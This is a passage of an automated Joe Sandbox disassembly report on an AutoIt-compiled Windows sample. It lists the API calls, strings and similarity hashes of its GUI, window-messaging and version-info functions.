                                                              • FrameRect.USER32(?,?,00000000), ref: 004BA6DF
                                                              • DeleteObject.GDI32(00000000), ref: 004BA6E6
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 004BA731
                                                              • FillRect.USER32(?,?,00000000), ref: 004BA763
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BA78E
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(00000012), ref: 004BA903
                                                                • Part of subcall function 004BA8CA: SetTextColor.GDI32(?,?), ref: 004BA907
                                                                • Part of subcall function 004BA8CA: GetSysColorBrush.USER32(0000000F), ref: 004BA91D
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(0000000F), ref: 004BA928
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(00000011), ref: 004BA945
                                                                • Part of subcall function 004BA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004BA953
                                                                • Part of subcall function 004BA8CA: SelectObject.GDI32(?,00000000), ref: 004BA964
                                                                • Part of subcall function 004BA8CA: SetBkColor.GDI32(?,00000000), ref: 004BA96D
                                                                • Part of subcall function 004BA8CA: SelectObject.GDI32(?,?), ref: 004BA97A
                                                                • Part of subcall function 004BA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 004BA999
                                                                • Part of subcall function 004BA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004BA9B0
                                                                • Part of subcall function 004BA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 004BA9C5
                                                                • Part of subcall function 004BA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004BA9ED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 0c1009a68a728ad4b215a5f3e75ed7fd65cac16bbdf8dd0c479867db99a78b01
                                                              • Instruction ID: 4330a7a9623b758152961859e2349c64fe57bd1d5b97182c5581baf5a54f6ec1
                                                              • Opcode Fuzzy Hash: 0c1009a68a728ad4b215a5f3e75ed7fd65cac16bbdf8dd0c479867db99a78b01
                                                              • Instruction Fuzzy Hash: 18917071408301FFCB109F68DC08A9B7BA9FF48321F104B3AF966961A1D775D949CB6A
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 004A74DE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A759D
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004A75DB
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004A75ED
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 004A7633
                                                              • GetClientRect.USER32(00000000,?), ref: 004A763F
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 004A7683
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004A7692
                                                              • GetStockObject.GDI32(00000011), ref: 004A76A2
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004A76A6
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004A76B6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004A76BF
                                                              • DeleteDC.GDI32(00000000), ref: 004A76C8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004A76F4
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 004A770B
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 004A7746
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004A775A
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 004A776B
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 004A779B
                                                              • GetStockObject.GDI32(00000011), ref: 004A77A6
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004A77B1
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004A77BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: abbb5aa052789cf38cba546dd165cff6e28e9b1a7aeaf1a914b50994832d095c
                                                              • Instruction ID: a9b32efbb8d84d1adf237f4a4397c730cc2acf76f9f61c4fff17d1d67b21ad56
                                                              • Opcode Fuzzy Hash: abbb5aa052789cf38cba546dd165cff6e28e9b1a7aeaf1a914b50994832d095c
                                                              • Instruction Fuzzy Hash: 76A17371A00605BFEB14DBA8DC4AFAF7B69EB09714F114265FA14A72E0C674AD10CF68
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049AD1E
                                                              • GetDriveTypeW.KERNEL32(?,004BFAC0,?,\\.\,004BF910), ref: 0049ADFB
                                                              • SetErrorMode.KERNEL32(00000000,004BFAC0,?,\\.\,004BF910), ref: 0049AF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 2a612b507905c0d604a238fd284f892f130157e80018aebee418c59a64baba5f
                                                              • Instruction ID: 2d4c8738eabbb27ead5b1bb68ed8b33ec2be632e8a59cbcf6c04d11ee773b161
                                                              • Opcode Fuzzy Hash: 2a612b507905c0d604a238fd284f892f130157e80018aebee418c59a64baba5f
                                                              • Instruction Fuzzy Hash: 2151B4B06441059B8F10DB11C942DBE7BA1EB48709B30417FF80AA7694DA7DAD22DB8F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: 13f54fbc9a197fad7bdd30e93c92220b60e0de23ffaa6380b44856b3114d48cd
                                                              • Instruction ID: 271ea1fbd57a96a91c6bd982e6ea5f843a8e7eb4efd9c11468fa0507a5e1a075
                                                              • Opcode Fuzzy Hash: 13f54fbc9a197fad7bdd30e93c92220b60e0de23ffaa6380b44856b3114d48cd
                                                              • Instruction Fuzzy Hash: 84810CB46002067ACF10AF62DC43FAF37A8AF09745F14902BFD056B292EB6DD945C66D
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 004B9AD2
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004B9B8B
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 004B9BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: ba20d1aa00bf13c266d35604fc3d3ef9ccf220ffb065fd011d32879bd180d7fc
                                                              • Instruction ID: a55902f07b5eb8a11621bb23b8f8a8d61baaebbcef74c89d174f2ecae72b8bbc
                                                              • Opcode Fuzzy Hash: ba20d1aa00bf13c266d35604fc3d3ef9ccf220ffb065fd011d32879bd180d7fc
                                                              • Instruction Fuzzy Hash: 2202AD30104201ABD725CF24C849BEBBBE5FF49314F04862EFA99963A1C778DD55CB6A
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 004BA903
                                                              • SetTextColor.GDI32(?,?), ref: 004BA907
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004BA91D
                                                              • GetSysColor.USER32(0000000F), ref: 004BA928
                                                              • CreateSolidBrush.GDI32(?), ref: 004BA92D
                                                              • GetSysColor.USER32(00000011), ref: 004BA945
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004BA953
                                                              • SelectObject.GDI32(?,00000000), ref: 004BA964
                                                              • SetBkColor.GDI32(?,00000000), ref: 004BA96D
                                                              • SelectObject.GDI32(?,?), ref: 004BA97A
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004BA999
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004BA9B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004BA9C5
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004BA9ED
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004BAA14
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 004BAA32
                                                              • DrawFocusRect.USER32(?,?), ref: 004BAA3D
                                                              • GetSysColor.USER32(00000011), ref: 004BAA4B
                                                              • SetTextColor.GDI32(?,00000000), ref: 004BAA53
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004BAA67
                                                              • SelectObject.GDI32(?,004BA5FA), ref: 004BAA7E
                                                              • DeleteObject.GDI32(?), ref: 004BAA89
                                                              • SelectObject.GDI32(?,?), ref: 004BAA8F
                                                              • DeleteObject.GDI32(?), ref: 004BAA94
                                                              • SetTextColor.GDI32(?,?), ref: 004BAA9A
                                                              • SetBkColor.GDI32(?,?), ref: 004BAAA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: e9cc502c1633a291c51eb18581a83ebf656a10a39246e8c06064bee289a03e4b
                                                              • Instruction ID: d43c3baa796381f7886760aa9eda615cf9d3b29bf43846211d731146408bb412
                                                              • Opcode Fuzzy Hash: e9cc502c1633a291c51eb18581a83ebf656a10a39246e8c06064bee289a03e4b
                                                              • Instruction Fuzzy Hash: 83513B71900208FFDF109FA8DC48EEE7BB9EB08320F114626F915AB2A1D7759954DFA4
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004B8AC1
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B8AD2
                                                              • CharNextW.USER32(0000014E), ref: 004B8B01
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004B8B42
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004B8B58
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B8B69
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004B8B86
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 004B8BD8
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004B8BEE
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 004B8C1F
                                                              • _memset.LIBCMT ref: 004B8C44
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004B8C8D
                                                              • _memset.LIBCMT ref: 004B8CEC
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004B8D16
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004B8D6E
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 004B8E1B
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004B8E3D
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B8E87
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B8EB4
                                                              • DrawMenuBar.USER32(?), ref: 004B8EC3
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 004B8EEB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: ac777a73c535bcfeeb2d93e153d47fba1648a5ed9d0719c8b8fb6877513aa659
                                                              • Instruction ID: 23d7fdc5e285c6afd07a961b29afc5a6fd05d39e59d57e9652904b062814a4bf
                                                              • Opcode Fuzzy Hash: ac777a73c535bcfeeb2d93e153d47fba1648a5ed9d0719c8b8fb6877513aa659
                                                              • Instruction Fuzzy Hash: A6E19270900208ABDF209F65CC84EEF7B7DEF09710F10815BFA15AA291DB789985DF69
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 004B49CA
                                                              • GetDesktopWindow.USER32 ref: 004B49DF
                                                              • GetWindowRect.USER32(00000000), ref: 004B49E6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004B4A48
                                                              • DestroyWindow.USER32(?), ref: 004B4A74
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004B4A9D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004B4ABB
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004B4AE1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004B4AF6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004B4B09
                                                              • IsWindowVisible.USER32(?), ref: 004B4B29
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004B4B44
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004B4B58
                                                              • GetWindowRect.USER32(?,?), ref: 004B4B70
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 004B4B96
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 004B4BB0
                                                              • CopyRect.USER32(?,?), ref: 004B4BC7
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 004B4C32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: 303280a4eb93fc09dbaa22a0c33e1c23ad95869dc3d9c0dc457ad9f3200cb728
                                                              • Instruction ID: f9360dae1ad0de899de88b421a9a3c9e5d919ddb6dce7d9d00b9f58ba266f128
                                                              • Opcode Fuzzy Hash: 303280a4eb93fc09dbaa22a0c33e1c23ad95869dc3d9c0dc457ad9f3200cb728
                                                              • Instruction Fuzzy Hash: 03B17E71604340AFDB04DF65C884B9BBBE4BF88714F008A1EF9999B292D775EC05CB69
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004944AC
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004944D2
                                                              • _wcscpy.LIBCMT ref: 00494500
                                                              • _wcscmp.LIBCMT ref: 0049450B
                                                              • _wcscat.LIBCMT ref: 00494521
                                                              • _wcsstr.LIBCMT ref: 0049452C
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00494548
                                                              • _wcscat.LIBCMT ref: 00494591
                                                              • _wcscat.LIBCMT ref: 00494598
                                                              • _wcsncpy.LIBCMT ref: 004945C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 14a29d1e3978c44b7a17c46782dc101b2f3d538e1a45bc2543c3328b1f74b483
                                                              • Instruction ID: 47dcc92a03768fed43477dabcb6cf82c3255cb2820327f8a8ec02472e7d01941
                                                              • Opcode Fuzzy Hash: 14a29d1e3978c44b7a17c46782dc101b2f3d538e1a45bc2543c3328b1f74b483
                                                              • Instruction Fuzzy Hash: 3641F8715002007BDB10AA75CC07EBF7B6CDF86715F10006FFD08A6183EA7C9A0A86AD
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004328BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 004328C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004328EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 004328F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0043291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00432939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00432949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0043297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00432990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004329AE
                                                              • GetStockObject.GDI32(00000011), ref: 004329CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004329D5
                                                                • Part of subcall function 00432344: GetCursorPos.USER32(?), ref: 00432357
                                                                • Part of subcall function 00432344: ScreenToClient.USER32(004F57B0,?), ref: 00432374
                                                                • Part of subcall function 00432344: GetAsyncKeyState.USER32(00000001), ref: 00432399
                                                                • Part of subcall function 00432344: GetAsyncKeyState.USER32(00000002), ref: 004323A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00431256), ref: 004329FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: ba1863de7012d3f676423803fa6413344796acf7870f3e7c162353cbe3011c74
                                                              • Instruction ID: 139a87d1f6620010c9d41582e0cfa1340ecca3fbf89163c7321fc33a5ada33fe
                                                              • Opcode Fuzzy Hash: ba1863de7012d3f676423803fa6413344796acf7870f3e7c162353cbe3011c74
                                                              • Instruction Fuzzy Hash: 66B15271600209EFDB14EFA8DD45BEE7BB4FB08315F10422AFA1597290DB78A851CF59
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0048A47A
                                                              • __swprintf.LIBCMT ref: 0048A51B
                                                              • _wcscmp.LIBCMT ref: 0048A52E
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0048A583
                                                              • _wcscmp.LIBCMT ref: 0048A5BF
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0048A5F6
                                                              • GetDlgCtrlID.USER32(?), ref: 0048A648
                                                              • GetWindowRect.USER32(?,?), ref: 0048A67E
                                                              • GetParent.USER32(?), ref: 0048A69C
                                                              • ScreenToClient.USER32(00000000), ref: 0048A6A3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0048A71D
                                                              • _wcscmp.LIBCMT ref: 0048A731
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0048A757
                                                              • _wcscmp.LIBCMT ref: 0048A76B
                                                                • Part of subcall function 0045362C: _iswctype.LIBCMT ref: 00453634
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                              • String ID: %s%u
                                                              • API String ID: 3744389584-679674701
                                                              • Opcode ID: 40454b99208e98746a6839c4c4fe215f3be82169db178303dd3e9a3f207b9e2b
                                                              • Instruction ID: a64362e5e4a5330be5c07ca594f51a39d195a4847090429a361c3b9d9b6f32c5
                                                              • Opcode Fuzzy Hash: 40454b99208e98746a6839c4c4fe215f3be82169db178303dd3e9a3f207b9e2b
                                                              • Instruction Fuzzy Hash: 7EA1D431204206AFE714EF64C884BAFB7E8FF44345F00492BF999D2150D778E965CB9A
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0048AF18
                                                              • _wcscmp.LIBCMT ref: 0048AF29
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0048AF51
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0048AF6E
                                                              • _wcscmp.LIBCMT ref: 0048AF8C
                                                              • _wcsstr.LIBCMT ref: 0048AF9D
